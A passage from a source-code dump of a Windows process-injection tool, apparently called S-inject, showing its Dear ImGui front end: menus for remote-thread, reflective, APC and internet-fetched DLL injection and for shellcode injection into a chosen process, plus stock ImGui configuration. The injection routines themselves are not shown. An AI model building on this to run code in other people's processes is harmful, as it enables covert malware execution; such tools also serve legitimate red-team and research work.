270 | 		colors[ImGuiCol_TitleBgActive] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY200);
271 | 		colors[ImGuiCol_TitleBgCollapsed] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY400);
272 | 		colors[ImGuiCol_MenuBarBg] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY100);
273 | 		colors[ImGuiCol_ScrollbarBg] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY100); // same as regular background
274 | 		colors[ImGuiCol_ScrollbarGrab] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY400);
275 | 		colors[ImGuiCol_ScrollbarGrabHovered] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY600);
276 | 		colors[ImGuiCol_ScrollbarGrabActive] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY700);
277 | 		colors[ImGuiCol_CheckMark] = ImGui::ColorConvertU32ToFloat4(Spectrum::BLUE500);
278 | 		colors[ImGuiCol_SliderGrab] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY700);
279 | 		colors[ImGuiCol_SliderGrabActive] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY800);
280 | 		colors[ImGuiCol_Button] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY75); // match default button to Spectrum's 'Action Button'.
281 | 		colors[ImGuiCol_ButtonHovered] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY50);
282 | 		colors[ImGuiCol_ButtonActive] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY200);
283 | 		colors[ImGuiCol_Header] = ImGui::ColorConvertU32ToFloat4(Spectrum::BLUE400);
284 | 		colors[ImGuiCol_HeaderHovered] = ImGui::ColorConvertU32ToFloat4(Spectrum::BLUE500);
285 | 		colors[ImGuiCol_HeaderActive] = ImGui::ColorConvertU32ToFloat4(Spectrum::BLUE600);
286 | 		colors[ImGuiCol_Separator] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY400);
287 | 		colors[ImGuiCol_SeparatorHovered] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY600);
288 | 		colors[ImGuiCol_SeparatorActive] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY700);
289 | 		colors[ImGuiCol_ResizeGrip] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY400);
290 | 		colors[ImGuiCol_ResizeGripHovered] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY600);
291 | 		colors[ImGuiCol_ResizeGripActive] = ImGui::ColorConvertU32ToFloat4(Spectrum::GRAY700);
292 | 		colors[ImGuiCol_PlotLines] = ImGui::ColorConvertU32ToFloat4(Spectrum::BLUE400);
293 | 		colors[ImGuiCol_PlotLinesHovered] = ImGui::ColorConvertU32ToFloat4(Spectrum::BLUE600);
294 | 		colors[ImGuiCol_PlotHistogram] = ImGui::ColorConvertU32ToFloat4(Spectrum::BLUE400);
295 | 		colors[ImGuiCol_PlotHistogramHovered] = ImGui::ColorConvertU32ToFloat4(Spectrum::BLUE600);
296 | 		colors[ImGuiCol_TextSelectedBg] = ImGui::ColorConvertU32ToFloat4((Spectrum::BLUE400 & 0x00FFFFFF) | 0x33000000);
297 | 		colors[ImGuiCol_DragDropTarget] = ImVec4(1.00f, 1.00f, 0.00f, 0.90f);
298 | 		colors[ImGuiCol_NavHighlight] = ImGui::ColorConvertU32ToFloat4((Spectrum::GRAY900 & 0x00FFFFFF) | 0x0A000000);
299 | 		colors[ImGuiCol_NavWindowingHighlight] = ImVec4(1.00f, 1.00f, 1.00f, 0.70f);
300 | 		colors[ImGuiCol_NavWindowingDimBg] = ImVec4(0.80f, 0.80f, 0.80f, 0.20f);
301 | 		colors[ImGuiCol_ModalWindowDimBg] = ImVec4(0.20f, 0.20f, 0.20f, 0.35f);
302 | 
303 | 	}
304 | 
305 | }


--------------------------------------------------------------------------------
/X-Inject/app/window.cpp:
--------------------------------------------------------------------------------
  1 | #include "window.h"
  2 | 
  3 | 
  4 | #include "../ext/imgui.h"
  5 | #include "../global.h"
  6 | 
  7 | #include <iostream>
  8 | #include <thread>
  9 | #include <wininet.h>
 10 | #include <string>
 11 | 
 12 | VOID MainWindow::InitWindow() {
 13 | #ifdef _WIN64
 14 | 	ImGui::Begin("S-inject x64", &MainWindow::bWindowOpen, ImGuiWindowFlags_NoCollapse);
 15 | #else
 16 | #ifdef _WIN32
 17 | 	ImGui::Begin("S-inject x32", &MainWindow::bWindowOpen, ImGuiWindowFlags_NoCollapse);
 18 | #endif // _WIN32
 19 | #endif // _WIN64
 20 | 	ImGui::Text("https://github.com/Joe1sn/S-inject");
 21 | 	if (!MainWindow::bWindowOpen)
 22 | 		exit(0);
 23 | 
 24 | 	ImGui::Checkbox("Remote Thread DLL Inject", &MainWindow::bRemoteThreadDll);
 25 | 	ImGui::Checkbox("Reflect DLL Inject", &MainWindow::bRefelectDll);
 26 | 	ImGui::Checkbox("APC DLL Inject", &MainWindow::bApcDll);
 27 | 	ImGui::Checkbox("Online DLL Inject", &MainWindow::bNetDll);
 28 | 	ImGui::Checkbox("Remote Shellcode Inject", &MainWindow::bInjectSc);
 29 | 	ImGui::Checkbox("APC Shellcode Inject", &MainWindow::bApcSc);
 30 | 	ImGui::Checkbox("Context Shellcode Inject", &MainWindow::bContextSc);
 31 | 	ImGui::Checkbox("List Injectable Process", &MainWindow::bList);
 32 | 	ImGui::Checkbox("Unject Process", &MainWindow::bIninject);
 33 | 	ImGui::End();
 34 | }
 35 | 
 36 | VOID MainWindow::Dispatcher() {
 37 | 	if (MainWindow::bRemoteThreadDll) {
 38 | 		MainWindow::RemoteDLL();
 39 | 	}
 40 | 	if (MainWindow::bRefelectDll) {
 41 | 		MainWindow::ReflectDLL();
 42 | 	}
 43 | 	if (MainWindow::bApcDll) {
 44 | 		MainWindow::ApcDLL();
 45 | 	}
 46 | 	if (MainWindow::bNetDll) {
 47 | 		MainWindow::NetDLL();
 48 | 	}
 49 | 
 50 | 	if (MainWindow::bInjectSc) {
 51 | 		MainWindow::RemoteShellcode();
 52 | 	}
 53 | 	if (MainWindow::bApcSc) {
 54 | 		MainWindow::ApcShellcode();
 55 | 	}
 56 | 	if (MainWindow::bContextSc) {
 57 | 		MainWindow::ContextShellcode();
 58 | 	}
 59 | 
 60 | 	if (MainWindow::bIninject) {
 61 | 		MainWindow::UnInject();
 62 | 	}
 63 | 
 64 | 	if (MainWindow::bList) {
 65 | 		MainWindow::DllList();
 66 | 	}
 67 | 	else if (!MainWindow::bList) {
 68 | 		if (!procInfoList.empty())
 69 | 			procInfoList.clear();
 70 | 	}
 71 | 
 72 | 	if (MainWindow::chooseDllPID) {
 73 | 		gDllPID = GetDllPID();
 74 | 	}
 75 | 	else if (!MainWindow::chooseDllPID) {
 76 | 		gDllPID = 0;
 77 | 		if (!procInfoInjectDll.empty())
 78 | 			procInfoInjectDll.clear();
 79 | 	}
 80 | 
 81 | 	if (MainWindow::chooseShellcodePID) {
 82 | 		gShellcodePID = GetShellcodePID();
 83 | 	}
 84 | 	else if (!MainWindow::chooseShellcodePID) {
 85 | 		gShellcodePID = 0;
 86 | 		if (!procInfoInjectShellcode.empty())
 87 | 			procInfoInjectShellcode.clear();
 88 | 	}
 89 | 
 90 | 	if (MainWindow::choosenNetPID) {
 91 | 		gNetPID = GetNetPID();
 92 | 	}
 93 | 	else if (!MainWindow::choosenNetPID) {
 94 | 		gNetPID = 0;
 95 | 		if (!procInfoInjectNet.empty())
 96 | 			procInfoInjectNet.clear();
 97 | 	}
 98 | }
 99 | 
100 | VOID MainWindow::InjectDLL(const char Title[], std::function<void(DWORD)>injectMenthod) {
101 | 	OPENFILENAMEA ofn;
102 | 	static char filePath[0x1000] = { 0 };
103 | 	static char test[0x1000] = { 0 };
104 | 	static int PID = 0;
105 | 
106 | 	bool chooseFile = false;
107 | 	bool inject = false;
108 | 
109 | 	ImGui::Begin(Title, nullptr, ImGuiWindowFlags_NoCollapse);
110 | 
111 | 	ImGui::InputText("FilePath", filePath, IM_ARRAYSIZE(filePath));
112 | 	ImGui::SameLine();
113 | 	chooseFile = ImGui::Button("Choose File");
114 | 	ImGui::InputInt("PID", &PID);
115 | 	ImGui::SameLine();
116 | 	ImGui::Checkbox("Choose Process", &MainWindow::chooseDllPID);
117 | 	inject = ImGui::Button("Inject");
118 | 
119 | 	if (chooseFile) {
120 | 		ZeroMemory(&ofn, sizeof(ofn));
121 | 		ofn.lStructSize = sizeof(ofn);
122 | 		ofn.hwndOwner = NULL;
123 | 		ofn.lpstrFilter = "All Files\0*.*\0";
124 | 		ofn.lpstrFile = filePath;
125 | 		ofn.nMaxFile = MAX_PATH;
126 | 		ofn.Flags = OFN_EXPLORER | OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
127 | 		ofn.lpstrDefExt = "";
128 | 		if (GetOpenFileNameA(&ofn)) {}
129 | 	}
130 | 	if (MainWindow::chooseDllPID) {
131 | 		PID = gDllPID;
132 | 		gDllPID = 0;
133 | 		if (PID != 0)
134 | 			MainWindow::chooseDllPID = false;
135 | 	}
136 | 	if (inject && PID != 0) {
137 | 		injector.dllPathSetter(filePath);
138 | 		std::string temp = filePath;
139 | 		if (temp.size() != 0) {
140 | 			injectMenthod(PID);
141 | 		}
142 | 	}
143 | 	ImGui::End();
144 | 
145 | }
146 | 
147 | VOID MainWindow::InjectDLL(const char Title[], std::function<void(DWORD,std::string)>injectMenthod) {
148 | 	OPENFILENAMEA ofn;
149 | 	static char url[0x1000] = { 0 };
150 | 	static int PID = 0;
151 | 
152 | 	bool inject = false;
153 | 
154 | 	ImGui::Begin(Title, nullptr, ImGuiWindowFlags_NoCollapse);
155 | 
156 | 	ImGui::InputText("URL", url, IM_ARRAYSIZE(url));
157 | 
158 | 	ImGui::InputInt("PID", &PID);
159 | 	ImGui::SameLine();
160 | 	ImGui::Checkbox("Choose Process", &MainWindow::choosenNetPID);
161 | 	inject = ImGui::Button("Inject");
162 | 
163 | 	if (MainWindow::choosenNetPID) {
164 | 		PID = gNetPID;
165 | 		gNetPID = 0;
166 | 		if (PID != 0)
167 | 			MainWindow::choosenNetPID = false;
168 | 	}
169 | 	if (inject && PID != 0) {
170 | 		std::string temp = url;
171 | 		if (temp.size() != 0) {
172 | 			injectMenthod(PID, url);
173 | 		}
174 | 	}
175 | 	ImGui::End();
176 | 
177 | }
178 | 
179 | 
180 | VOID MainWindow::InjectShellcode(const char Title[], std::function<void(std::string, DWORD)>injectMenthod) {
181 | 	static char Shellcode[0x1000] = { 0 };
182 | 	static int scPID = 0;
183 | 
184 | 	bool inject = false;
185 | 
186 | 	ImGui::Begin(Title, nullptr, ImGuiWindowFlags_NoCollapse);
187 | 
188 | 	ImGui::InputText("Shellcode", Shellcode, IM_ARRAYSIZE(Shellcode));
189 | 	ImGui::InputInt("PID       ", &scPID);
190 | 	ImGui::SameLine();
191 | 	ImGui::Checkbox("Choose Process", &MainWindow::chooseShellcodePID);
192 | 	inject = ImGui::Button("Inject");
193 | 
194 | 	if (MainWindow::chooseShellcodePID) {
195 | 		scPID = gShellcodePID;
196 | 		gShellcodePID = 0;
197 | 		if (scPID != 0)
198 | 			MainWindow::chooseShellcodePID = false;
199 | 	}
200 | 	if (inject && scPID != 0) {
201 | 		std::string temp = Shellcode;
202 | 		if (temp.size() != 0) {
203 | 			injectMenthod(temp, scPID);
204 | 		}
205 | 	}
206 | 	ImGui::End();
207 | 
208 | }
209 | 
210 | VOID MainWindow::RemoteDLL() {
211 | 	auto func = [&](DWORD x) {
212 | 		injector.remoteThreadInject(x);
213 | 	};
214 | 	MainWindow::InjectDLL("Remote DLL Inject", func);
215 | }
216 | 
217 | VOID MainWindow::ReflectDLL() {
218 | 	auto func = [&](DWORD x) {
219 | 		injector.reflectInject(x);
220 | 	};
221 | 	MainWindow::InjectDLL("Reflect DLL Inject", func);
222 | }
223 | 
224 | VOID MainWindow::ApcDLL() {
225 | 	auto func = [&](DWORD x) {
226 | 		injector.apcInject(x);
227 | 	};
228 | 	MainWindow::InjectDLL("APC DLL Inject", func);
229 | }
230 | 
231 | VOID MainWindow::NetDLL() {
232 | 	auto func = [&](DWORD x, std::string dllContent) {
233 | 		injector.internetInject(x, dllContent);
234 | 	};
235 | 	MainWindow::InjectDLL("Inject From Internet", func);
236 | }
237 | 
238 | VOID MainWindow::UnInject() {
239 | 	auto func = [&](DWORD x) {
240 | 		injector.unInject(x);
241 | 	};
242 | 	MainWindow::InjectDLL("UnInject DLL", func);
243 | }
244 | 
245 | 
246 | 
247 | 
248 | 
249 | 
250 | VOID MainWindow::RemoteShellcode() {
251 | 	auto func = [&](std::string shellcode, DWORD x) {
252 | 		injector.shellcodeInject(shellcode, x);
253 | 	};
254 | 	MainWindow::InjectShellcode("Remote Shellcode Inject", func);
255 | }
256 | 
257 | VOID MainWindow::ApcShellcode() {
258 | 	auto func = [&](std::string shellcode, DWORD x) {
259 | 		injector.apcShellcodeInject(shellcode, x);
260 | 	};
261 | 	MainWindow::InjectShellcode("APC Shellcode Inject", func);
262 | }
263 | 
264 | VOID MainWindow::ContextShellcode() {
265 | 	auto func = [&](std::string shellcode, DWORD x) {
266 | 		injector.contextShellcodeInject(shellcode, x);
267 | 	};
268 | 	MainWindow::InjectShellcode("Context Shellcode Inject", func);
269 | }
270 | 
271 | VOID MainWindow::DllList() {
272 | 	ImGui::Begin("Injectable Process", nullptr, ImGuiWindowFlags_NoCollapse);
273 | 
274 | 	//TODO:
275 | 	if (procInfoList.empty())
276 | 		procInfoList = injector.injectList();
277 | 	ImGui::BeginTable("Table", 2, ImGuiTableFlags_Borders);
278 | 
279 | 	// Table header
280 | 	ImGui::TableSetupColumn("PID");
281 | 	ImGui::TableSetupColumn("ProcessName");
282 | 	ImGui::TableHeadersRow();
283 | 	// Table data
284 | 	for (int i = 0; i < procInfoList.size(); i++) {
285 | 		ImGui::TableNextRow();
286 | 		ImGui::TableNextColumn();
287 | 		ImGui::Text("%d", procInfoList[i].pid);
288 | 		ImGui::TableNextColumn();
289 | 		ImGui::Text("%ws", procInfoList[i].processName.c_str());
290 | 	}
291 | 
292 | 	// End table
293 | 	ImGui::EndTable();
294 | 	ImGui::End();
295 | }
296 | 
297 | DWORD MainWindow::GetDllPID() {
298 | 	bool click = false;
299 | 	ImGui::Begin("process id", nullptr, ImGuiWindowFlags_NoCollapse);
300 | 
301 | 	if (procInfoInjectDll.empty())
302 | 		procInfoInjectDll = injector.injectList();
303 | 	ImGui::BeginTable("Table", 2, ImGuiTableFlags_Borders);
304 | 
305 | 	// Table header
306 | 	ImGui::TableSetupColumn("PID");
307 | 	ImGui::TableSetupColumn("ProcessName");
308 | 	ImGui::TableHeadersRow();
309 | 
310 | 	// Table data
311 | 
312 | 	for (int i = 0; i < procInfoInjectDll.size(); i++) {
313 | 		ImGui::TableNextRow();
314 | 		ImGui::TableNextColumn();
315 | 		click = ImGui::Button(std::to_string(procInfoInjectDll[i].pid).c_str());
316 | 		ImGui::TableNextColumn();
317 | 		ImGui::Text("%ws", procInfoInjectDll[i].processName.c_str());
318 | 		if (click) {
319 | 			ImGui::EndTable();
320 | 			ImGui::End();
321 | 			return procInfoInjectDll[i].pid;
322 | 		}
323 | 	}
324 | 
325 | 	// End table
326 | 	ImGui::EndTable();
327 | 	ImGui::End();
328 | 	return 0;
329 | }
330 | 
331 | 
332 | DWORD MainWindow::GetShellcodePID() {
333 | 	bool click = false;
334 | 	ImGui::Begin("shellcode process id", nullptr, ImGuiWindowFlags_NoCollapse);
335 | 
336 | 	if (procInfoInjectShellcode.empty())
337 | 		procInfoInjectShellcode = injector.injectList();
338 | 	ImGui::BeginTable("Table", 2, ImGuiTableFlags_Borders);
339 | 
340 | 	// Table header
341 | 	ImGui::TableSetupColumn("PID");
342 | 	ImGui::TableSetupColumn("ProcessName");
343 | 	ImGui::TableHeadersRow();
344 | 
345 | 	// Table data
346 | 
347 | 	for (int i = 0; i < procInfoInjectShellcode.size(); i++) {
348 | 		ImGui::TableNextRow();
349 | 		ImGui::TableNextColumn();
350 | 		click = ImGui::Button(std::to_string(procInfoInjectShellcode[i].pid).c_str());
351 | 		ImGui::TableNextColumn();
352 | 		ImGui::Text("%ws", procInfoInjectShellcode[i].processName.c_str());
353 | 		if (click) {
354 | 			ImGui::EndTable();
355 | 			ImGui::End();
356 | 			return procInfoInjectShellcode[i].pid;
357 | 		}
358 | 	}
359 | 
360 | 	// End table
361 | 	ImGui::EndTable();
362 | 	ImGui::End();
363 | 	return 0;
364 | }
365 | 
366 | 
367 | DWORD MainWindow::GetNetPID() {
368 | 	bool click = false;
369 | 	ImGui::Begin("process id", nullptr, ImGuiWindowFlags_NoCollapse);
370 | 
371 | 	if (procInfoInjectNet.empty())
372 | 		procInfoInjectNet = injector.injectList();
373 | 	ImGui::BeginTable("Table", 2, ImGuiTableFlags_Borders);
374 | 
375 | 	// Table header
376 | 	ImGui::TableSetupColumn("PID");
377 | 	ImGui::TableSetupColumn("ProcessName");
378 | 	ImGui::TableHeadersRow();
379 | 
380 | 	// Table data
381 | 
382 | 	for (int i = 0; i < procInfoInjectNet.size(); i++) {
383 | 		ImGui::TableNextRow();
384 | 		ImGui::TableNextColumn();
385 | 		click = ImGui::Button(std::to_string(procInfoInjectNet[i].pid).c_str());
386 | 		ImGui::TableNextColumn();
387 | 		ImGui::Text("%ws", procInfoInjectNet[i].processName.c_str());
388 | 		if (click) {
389 | 			ImGui::EndTable();
390 | 			ImGui::End();
391 | 			return procInfoInjectNet[i].pid;
392 | 		}
393 | 	}
394 | 
395 | 	// End table
396 | 	ImGui::EndTable();
397 | 	ImGui::End();
398 | 	return 0;
399 | }
400 | 
401 | 


--------------------------------------------------------------------------------
/X-Inject/app/window.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include "./Injector.h"
 3 | 
 4 | #include <Windows.h>
 5 | #include <functional>
 6 | #include <iostream>
 7 | 
 8 | namespace MainWindow {
 9 | 	inline Injector injector;
10 | 	inline std::vector<ProcessInfo> procInfoList;
11 | 	inline std::vector<ProcessInfo> procInfoInjectDll;
12 | 	inline std::vector<ProcessInfo> procInfoInjectShellcode;
13 | 	inline std::vector<ProcessInfo> procInfoInjectNet;
14 | 
15 | 
16 | 	inline bool bWindowOpen = true;
17 | 	inline bool bRemoteThreadDll = false;
18 | 	inline bool bRefelectDll = false;
19 | 	inline bool bApcDll = false;
20 | 	inline bool bNetDll = false;
21 | 	inline bool bInjectSc = false;
22 | 	inline bool bApcSc = false;
23 | 	inline bool bContextSc = false;
24 | 	inline bool bList = false;
25 | 	inline bool bIninject = false;
26 | 	
27 | 	inline bool chooseDllPID = false;
28 | 	inline bool chooseShellcodePID = false;
29 | 	inline bool choosenNetPID = false;
30 | 
31 | 	inline DWORD gDllPID = 0;
32 | 	inline DWORD gShellcodePID = 0;
33 | 	inline DWORD gNetPID = 0;
34 | 
35 | 	VOID InitWindow();
36 | 	VOID Dispatcher();
37 | 
38 | 	//modName: DLL/Shellcode
39 | 	//VOID Inject(std::string modName, const char Title[], std::function<void(DWORD)>injectMenthod);
40 | 	VOID InjectDLL(const char Title[], std::function<void(DWORD)>injectMenthod);
41 | 	VOID InjectDLL(const char Title[], std::function<void(DWORD, std::string)>injectMenthod);
42 | 
43 | 	VOID InjectShellcode(const char Title[], std::function<void(std::string, DWORD)>injectMenthod);
44 | 	VOID RemoteDLL();
45 | 	VOID ReflectDLL();
46 | 	VOID ApcDLL();
47 | 	VOID NetDLL();
48 | 	VOID RemoteShellcode();
49 | 	VOID ApcShellcode();
50 | 	VOID ContextShellcode();
51 | 	VOID DllList();
52 | 	VOID UnInject();
53 | 	DWORD GetDllPID();
54 | 	DWORD GetShellcodePID();
55 | 	DWORD GetNetPID();
56 | }
57 | 
58 | 


--------------------------------------------------------------------------------
/X-Inject/ext/imconfig.h:
--------------------------------------------------------------------------------
  1 | //-----------------------------------------------------------------------------
  2 | // DEAR IMGUI COMPILE-TIME OPTIONS
  3 | // Runtime options (clipboard callbacks, enabling various features, etc.) can generally be set via the ImGuiIO structure.
  4 | // You can use ImGui::SetAllocatorFunctions() before calling ImGui::CreateContext() to rewire memory allocation functions.
  5 | //-----------------------------------------------------------------------------
  6 | // A) You may edit imconfig.h (and not overwrite it when updating Dear ImGui, or maintain a patch/rebased branch with your modifications to it)
  7 | // B) or '#define IMGUI_USER_CONFIG "my_imgui_config.h"' in your project and then add directives in your own file without touching this template.
  8 | //-----------------------------------------------------------------------------
  9 | // You need to make sure that configuration settings are defined consistently _everywhere_ Dear ImGui is used, which include the imgui*.cpp
 10 | // files but also _any_ of your code that uses Dear ImGui. This is because some compile-time options have an affect on data structures.
 11 | // Defining those options in imconfig.h will ensure every compilation unit gets to see the same data structure layouts.
 12 | // Call IMGUI_CHECKVERSION() from your .cpp file to verify that the data structures your files are using are matching the ones imgui.cpp is using.
 13 | //-----------------------------------------------------------------------------
 14 | 
 15 | #pragma once
 16 | 
 17 | //---- Define assertion handler. Defaults to calling assert().
 18 | // If your macro uses multiple statements, make sure is enclosed in a 'do { .. } while (0)' block so it can be used as a single statement.
 19 | //#define IM_ASSERT(_EXPR)  MyAssert(_EXPR)
 20 | //#define IM_ASSERT(_EXPR)  ((void)(_EXPR))     // Disable asserts
 21 | 
 22 | //---- Define attributes of all API symbols declarations, e.g. for DLL under Windows
 23 | // Using Dear ImGui via a shared library is not recommended, because of function call overhead and because we don't guarantee backward nor forward ABI compatibility.
 24 | // DLL users: heaps and globals are not shared across DLL boundaries! You will need to call SetCurrentContext() + SetAllocatorFunctions()
 25 | // for each static/DLL boundary you are calling from. Read "Context and Memory Allocators" section of imgui.cpp for more details.
 26 | //#define IMGUI_API __declspec( dllexport )
 27 | //#define IMGUI_API __declspec( dllimport )
 28 | 
 29 | //---- Don't define obsolete functions/enums/behaviors. Consider enabling from time to time after updating to clean your code of obsolete function/names.
 30 | //#define IMGUI_DISABLE_OBSOLETE_FUNCTIONS
 31 | //#define IMGUI_DISABLE_OBSOLETE_KEYIO                      // 1.87+ disable legacy io.KeyMap[]+io.KeysDown[] in favor io.AddKeyEvent(). This is automatically done by IMGUI_DISABLE_OBSOLETE_FUNCTIONS.
 32 | 
 33 | //---- Disable all of Dear ImGui or don't implement standard windows/tools.
 34 | // It is very strongly recommended to NOT disable the demo windows and debug tool during development. They are extremely useful in day to day work. Please read comments in imgui_demo.cpp.
 35 | //#define IMGUI_DISABLE                                     // Disable everything: all headers and source files will be empty.
 36 | //#define IMGUI_DISABLE_DEMO_WINDOWS                        // Disable demo windows: ShowDemoWindow()/ShowStyleEditor() will be empty.
 37 | //#define IMGUI_DISABLE_DEBUG_TOOLS                         // Disable metrics/debugger and other debug tools: ShowMetricsWindow(), ShowDebugLogWindow() and ShowIDStackToolWindow() will be empty.
 38 | 
 39 | //---- Don't implement some functions to reduce linkage requirements.
 40 | //#define IMGUI_DISABLE_WIN32_DEFAULT_CLIPBOARD_FUNCTIONS   // [Win32] Don't implement default clipboard handler. Won't use and link with OpenClipboard/GetClipboardData/CloseClipboard etc. (user32.lib/.a, kernel32.lib/.a)
 41 | //#define IMGUI_ENABLE_WIN32_DEFAULT_IME_FUNCTIONS          // [Win32] [Default with Visual Studio] Implement default IME handler (require imm32.lib/.a, auto-link for Visual Studio, -limm32 on command-line for MinGW)
 42 | //#define IMGUI_DISABLE_WIN32_DEFAULT_IME_FUNCTIONS         // [Win32] [Default with non-Visual Studio compilers] Don't implement default IME handler (won't require imm32.lib/.a)
 43 | //#define IMGUI_DISABLE_WIN32_FUNCTIONS                     // [Win32] Won't use and link with any Win32 function (clipboard, IME).
 44 | //#define IMGUI_ENABLE_OSX_DEFAULT_CLIPBOARD_FUNCTIONS      // [OSX] Implement default OSX clipboard handler (need to link with '-framework ApplicationServices', this is why this is not the default).
 45 | //#define IMGUI_DISABLE_DEFAULT_FORMAT_FUNCTIONS            // Don't implement ImFormatString/ImFormatStringV so you can implement them yourself (e.g. if you don't want to link with vsnprintf)
 46 | //#define IMGUI_DISABLE_DEFAULT_MATH_FUNCTIONS              // Don't implement ImFabs/ImSqrt/ImPow/ImFmod/ImCos/ImSin/ImAcos/ImAtan2 so you can implement them yourself.
 47 | //#define IMGUI_DISABLE_FILE_FUNCTIONS                      // Don't implement ImFileOpen/ImFileClose/ImFileRead/ImFileWrite and ImFileHandle at all (replace them with dummies)
 48 | //#define IMGUI_DISABLE_DEFAULT_FILE_FUNCTIONS              // Don't implement ImFileOpen/ImFileClose/ImFileRead/ImFileWrite and ImFileHandle so you can implement them yourself if you don't want to link with fopen/fclose/fread/fwrite. This will also disable the LogToTTY() function.
 49 | //#define IMGUI_DISABLE_DEFAULT_ALLOCATORS                  // Don't implement default allocators calling malloc()/free() to avoid linking with them. You will need to call ImGui::SetAllocatorFunctions().
 50 | //#define IMGUI_DISABLE_SSE                                 // Disable use of SSE intrinsics even if available
 51 | 
 52 | //---- Include imgui_user.h at the end of imgui.h as a convenience
 53 | // May be convenient for some users to only explicitly include vanilla imgui.h and have extra stuff included.
 54 | //#define IMGUI_INCLUDE_IMGUI_USER_H
 55 | //#define IMGUI_USER_H_FILENAME         "my_folder/my_imgui_user.h"
 56 | 
 57 | //---- Pack colors to BGRA8 instead of RGBA8 (to avoid converting from one to another)
 58 | //#define IMGUI_USE_BGRA_PACKED_COLOR
 59 | 
 60 | //---- Use 32-bit for ImWchar (default is 16-bit) to support Unicode planes 1-16. (e.g. point beyond 0xFFFF like emoticons, dingbats, symbols, shapes, ancient languages, etc...)
 61 | //#define IMGUI_USE_WCHAR32
 62 | 
 63 | //---- Avoid multiple STB libraries implementations, or redefine path/filenames to prioritize another version
 64 | // By default the embedded implementations are declared static and not available outside of Dear ImGui sources files.
 65 | //#define IMGUI_STB_TRUETYPE_FILENAME   "my_folder/stb_truetype.h"
 66 | //#define IMGUI_STB_RECT_PACK_FILENAME  "my_folder/stb_rect_pack.h"
 67 | //#define IMGUI_STB_SPRINTF_FILENAME    "my_folder/stb_sprintf.h"    // only used if IMGUI_USE_STB_SPRINTF is defined.
 68 | //#define IMGUI_DISABLE_STB_TRUETYPE_IMPLEMENTATION
 69 | //#define IMGUI_DISABLE_STB_RECT_PACK_IMPLEMENTATION
 70 | //#define IMGUI_DISABLE_STB_SPRINTF_IMPLEMENTATION                   // only disabled if IMGUI_USE_STB_SPRINTF is defined.
 71 | 
 72 | //---- Use stb_sprintf.h for a faster implementation of vsnprintf instead of the one from libc (unless IMGUI_DISABLE_DEFAULT_FORMAT_FUNCTIONS is defined)
 73 | // Compatibility checks of arguments and formats done by clang and GCC will be disabled in order to support the extra formats provided by stb_sprintf.h.
 74 | //#define IMGUI_USE_STB_SPRINTF
 75 | 
 76 | //---- Use FreeType to build and rasterize the font atlas (instead of stb_truetype which is embedded by default in Dear ImGui)
 77 | // Requires FreeType headers to be available in the include path. Requires program to be compiled with 'misc/freetype/imgui_freetype.cpp' (in this repository) + the FreeType library (not provided).
 78 | // On Windows you may use vcpkg with 'vcpkg install freetype --triplet=x64-windows' + 'vcpkg integrate install'.
 79 | //#define IMGUI_ENABLE_FREETYPE
 80 | 
 81 | //---- Use FreeType+lunasvg library to render OpenType SVG fonts (SVGinOT)
 82 | // Requires lunasvg headers to be available in the include path + program to be linked with the lunasvg library (not provided).
 83 | // Only works in combination with IMGUI_ENABLE_FREETYPE.
 84 | // (implementation is based on Freetype's rsvg-port.c which is licensed under CeCILL-C Free Software License Agreement)
 85 | //#define IMGUI_ENABLE_FREETYPE_LUNASVG
 86 | 
 87 | //---- Use stb_truetype to build and rasterize the font atlas (default)
 88 | // The only purpose of this define is if you want force compilation of the stb_truetype backend ALONG with the FreeType backend.
 89 | //#define IMGUI_ENABLE_STB_TRUETYPE
 90 | 
 91 | //---- Define constructor and implicit cast operators to convert back<>forth between your math types and ImVec2/ImVec4.
 92 | // This will be inlined as part of ImVec2 and ImVec4 class declarations.
 93 | /*
 94 | #define IM_VEC2_CLASS_EXTRA                                                     \
 95 |         constexpr ImVec2(const MyVec2& f) : x(f.x), y(f.y) {}                   \
 96 |         operator MyVec2() const { return MyVec2(x,y); }
 97 | 
 98 | #define IM_VEC4_CLASS_EXTRA                                                     \
 99 |         constexpr ImVec4(const MyVec4& f) : x(f.x), y(f.y), z(f.z), w(f.w) {}   \
100 |         operator MyVec4() const { return MyVec4(x,y,z,w); }
101 | */
102 | //---- ...Or use Dear ImGui's own very basic math operators.
103 | //#define IMGUI_DEFINE_MATH_OPERATORS
104 | 
105 | //---- Use 32-bit vertex indices (default is 16-bit) is one way to allow large meshes with more than 64K vertices.
106 | // Your renderer backend will need to support it (most example renderer backends support both 16/32-bit indices).
107 | // Another way to allow large meshes while keeping 16-bit indices is to handle ImDrawCmd::VtxOffset in your renderer.
108 | // Read about ImGuiBackendFlags_RendererHasVtxOffset for details.
109 | //#define ImDrawIdx unsigned int
110 | 
111 | //---- Override ImDrawCallback signature (will need to modify renderer backends accordingly)
112 | //struct ImDrawList;
113 | //struct ImDrawCmd;
114 | //typedef void (*MyImDrawCallback)(const ImDrawList* draw_list, const ImDrawCmd* cmd, void* my_renderer_user_data);
115 | //#define ImDrawCallback MyImDrawCallback
116 | 
117 | //---- Debug Tools: Macro to break in Debugger (we provide a default implementation of this in the codebase)
118 | // (use 'Metrics->Tools->Item Picker' to pick widgets with the mouse and break into them for easy debugging.)
119 | //#define IM_DEBUG_BREAK  IM_ASSERT(0)
120 | //#define IM_DEBUG_BREAK  __debugbreak()
121 | 
122 | //---- Debug Tools: Enable slower asserts
123 | //#define IMGUI_DEBUG_PARANOID
124 | 
125 | //---- Tip: You can add extra functions within the ImGui:: namespace from anywhere (e.g. your own sources/header files)
126 | /*
127 | namespace ImGui
128 | {
